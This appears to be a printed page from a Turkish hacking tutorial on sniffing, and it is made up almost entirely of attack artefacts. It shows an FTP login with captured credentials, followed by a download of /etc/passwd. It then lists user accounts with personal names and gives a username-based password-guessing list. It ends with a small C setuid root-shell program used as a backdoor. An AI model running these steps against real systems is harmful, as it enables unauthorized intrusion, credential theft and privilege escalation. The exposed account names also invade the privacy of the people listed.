URL: http://www.olympos.org/article/articleprint/152/-1/10/3__goz_sniffing |
3. Göz (Sniffing) |
|
[root@netblock /]# ftp xxxxxx.net Connected to xxxxx.net. 220 ProFTPD 1.2.5rc1 Server (ProFTPD Default Installation) [xxxxxx.net] Name (xxxxx.net:xxxxx): cilekous 331 Password required for cilekous. Password: 230 User cilekous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get /etc/passwd ..... 227 Entering Passive Mode .... 150 Opening BINARY mode data connection for /etc/passwd (30000 bytes). 226 Transfer complete. .... |
...... georgevi:*:24371:100:Mathias George:/usr/home/georgev:/bin/sh georgilav:*:24371:100:Georgila Vessula:/usr/home/georgila:/bin/sh ghikas:*:24371:100:Yrio Ghikas:/usr/home/ghikaso:/bin/sh gianniss:*:24371:100:giannis feeds:/usr/home/giannis:/bin/sh giano:*:24371:100:Gianopoulos:/usr/home/gianopou:/bin/sh gisop:*:24371:100:poulou:/usr/home/gisop:/bin/sh karelos:*:24371:100:Karelos:/usr/home/karelos:/bin/sh ourgoul:*:24371:100:ourgoulis:/usr/home/ourgoul:/bin/sh oxou:*:24371:100:oxoou:/usr/home/oxou:/bin/sh jstas:*:24371:100:Stas:/usr/home/jsta:/bin/sh kabasi:*:24371:100:Mandy Kabassi:/usr/home/kabas:/bin/sh kamberi:*:24371:100:roula beri:/usr/home/kamberi:/bin/sh kandou:*:24371:100:Juliasous Kandouros:/usr/home/kandou:/bin/sh ...... |
.... georgevi:georgevi georgevi:georgevi1 georgilav:georgilav georgilav:georgilav1 ghikas:ghikas ghikas:ghikas1 gianniss:gianniss gianniss:gianniss1 giano:giano giano:giano1 gisop:gisop gisop:gisop1 karelos:karelos karelos:karelos1 ourgoul:ourgoul ourgoul:ourgoul1 oxou:oxou oxou:oxou1 jstas:jstas jstas:jstas1 kabasi:kabasi kabasi:kabasi1 kamberi:kamberi kamberi:kamberi1 kandou:kandou kandou:kandou1 .... |
|
|
#include<stdlib.h>
main ()
{
setuid(0);
system("/bin/bash");
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|